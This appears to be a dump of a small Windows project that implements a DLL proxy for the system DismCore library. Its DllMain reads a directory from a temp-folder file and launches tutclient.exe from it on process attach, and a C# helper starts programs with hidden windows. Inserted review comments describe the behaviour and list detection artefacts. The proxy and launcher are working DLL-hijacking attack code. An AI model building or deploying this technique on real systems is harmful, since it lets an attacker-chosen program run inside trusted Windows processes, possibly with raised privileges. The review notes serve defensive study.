-------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 
3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Diagnostics; 7 | 8 | namespace testAnything 9 | { 10 | class Program 11 | { 12 | static void Main(string[] args) 13 | { 14 | ProcessStartInfo startInfo = new ProcessStartInfo(); 15 | startInfo.FileName = args[0]; 16 | startInfo.Arguments = args[1]; 17 | startInfo.WindowStyle = ProcessWindowStyle.Hidden; 18 | Process proc = new Process(); 19 | proc.StartInfo = startInfo; 20 | proc.Start(); 21 | proc.WaitForExit(); 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /testAnything/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("testAnything")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("testAnything")] 13 | [assembly: AssemblyCopyright("Copyright © 2017")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("56bae5a3-b462-439f-adf6-f98676a679c5")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /testDll/Main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 |
// DllMain: loader entry point of testDll.
//
// On every call, whatever dwReason is, it emits a debug string and then reads the
// first line of "clientlocationx12.txt" from the directory GetTempPathA reports,
// treating that line as a directory (startDirectory). Only for DLL_PROCESS_ATTACH
// does it go on to start "<startDirectory>\tutclient.exe" in a new console, with
// startDirectory as the working directory.
//
// hModule and reserved are not used. The function always returns TRUE, including
// when the file is missing or CreateProcessA fails.
//
// NOTE(review), defensive reading: the program to start is chosen by the contents
// of a file in the temp directory, and it is started by whichever process loaded
// this DLL, so by default it runs in that process's security context. Artefacts
// visible in this listing that a detection can key on: the file name
// clientlocationx12.txt, the image name tutclient.exe, and the debug string below.
//
// NOTE(review): the file I/O and CreateProcessA both run inside DllMain, i.e.
// while the loader lock is held, which Microsoft's DllMain guidance advises against.
6 | BOOL APIENTRY DllMain(HANDLE hModule, DWORD dwReason, VOID* reserved)
7 | {
8 |     OutputDebugString(TEXT("Testing output Debug string")); // emitted for every notification, not just process attach
9 |
10 |     std::ifstream infile;
11 |     char tempBuf[MAX_PATH];
12 |     GetTempPathA(MAX_PATH, tempBuf); // return value unchecked; on failure tempBuf stays uninitialised and is still read below
13 |     std::string tempFolder = tempBuf;
14 |     tempFolder += "\\clientlocationx12.txt"; // GetTempPathA is documented to end its result with a backslash, so the separator is doubled here
15 |     infile.open(tempFolder.c_str());
16 |     std::string startDirectory;
17 |     std::string exePath;
18 |
19 |     if (infile.is_open())
20 |     {
21 |         while (!infile.eof())
22 |         {
23 |             std::getline(infile, startDirectory); // the line is used as-is; no validation of the path it contains
24 |             break; // loop body runs at most once: only the first line of the file is read
25 |         }
26 |     }
27 |
28 |     infile.close(); // called even when the open failed
29 |
30 |     exePath += startDirectory + "\\tutclient.exe"; // with no file, startDirectory is empty and this is "\tutclient.exe"
31 |
32 |     switch (dwReason)
33 |     {
34 |     case DLL_PROCESS_ATTACH:
35 |
36 |         STARTUPINFOA lpStartupInfo;
37 |         PROCESS_INFORMATION lpProcessInfo;
38 |         memset(&lpStartupInfo, 0, sizeof(lpStartupInfo)); // cb is left at 0; it is never set to sizeof(STARTUPINFOA)
39 |         memset(&lpProcessInfo, 0, sizeof(lpProcessInfo));
40 |
41 |         /* Create the process */
          // No command line, no handle inheritance, new console, inherited environment,
          // working directory = startDirectory. On success the hProcess and hThread
          // handles returned in lpProcessInfo are never closed.
42 |         if (!CreateProcessA(exePath.c_str(), NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, startDirectory.c_str(), &lpStartupInfo, &lpProcessInfo))
43 |         {
              // Failure is only written to the host process's stdout; DllMain still returns TRUE.
44 |             std::cout << "Not 
Worknig" << GetLastError() << std::endl;
45 |         }
46 |         break;
47 |     }
48 |
49 |     return TRUE;
50 | }
-------------------------------------------------------------------------------- /testDll/dismCore.cpp: --------------------------------------------------------------------------------
1 | //The exports
2 |
3 | //DllCanUnloadNow
4 | //DllGetClassObject
5 | //DllRegisterServer
6 | //DllUnregisterServer
7 |
// Each /export directive below makes the linker emit the named entry point as a
// forwarder to the export of the same name in C:/Windows/System32/Dism/DismCore,
// so this DLL implements none of the four functions itself.
//
// NOTE(review): a module that forwards these exports to the System32 DismCore
// instead of implementing them is acting as a proxy for that library. Image-load
// events for such a module from a directory other than C:/Windows/System32/Dism
// are the thing to alert on. How the built DLL is named and placed is not shown
// in this listing.
8 | #pragma comment(linker, "/export:DllCanUnloadNow=C:/Windows/System32/Dism/DismCore.DllCanUnloadNow")
9 | #pragma comment(linker, "/export:DllGetClassObject=C:/Windows/System32/Dism/DismCore.DllGetClassObject")
10 | #pragma comment(linker, "/export:DllRegisterServer=C:/Windows/System32/Dism/DismCore.DllRegisterServer")
11 | #pragma comment(linker, "/export:DllUnregisterServer=C:/Windows/System32/Dism/DismCore.DllUnregisterServer")
-------------------------------------------------------------------------------- /testDll/testDll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5} 24 | Win32Proj 25 | testDll 26 | 10.0.14393.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | Unicode 47 | Static 48 | 49 | 50 | DynamicLibrary 51 | false 52 | v141 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | true 79 | 80 | 81 | false 82 | 83 | 84 | false 85 | 86 | 87 | 88 | 89 | 90 | Level3 91 | Disabled 92 | WIN32;_DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 93 | 94 | 95 | Windows 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | 
_DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 105 | 106 | 107 | Windows 108 | 109 | 110 | 111 | 112 | 113 | 114 | Level3 115 | 116 | 117 | MaxSpeed 118 | true 119 | true 120 | WIN32;NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 121 | 122 | 123 | Windows 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 137 | 138 | 139 | Windows 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /testDll/testDll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | -------------------------------------------------------------------------------- /unattend.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | --------------------------------------------------------------------------------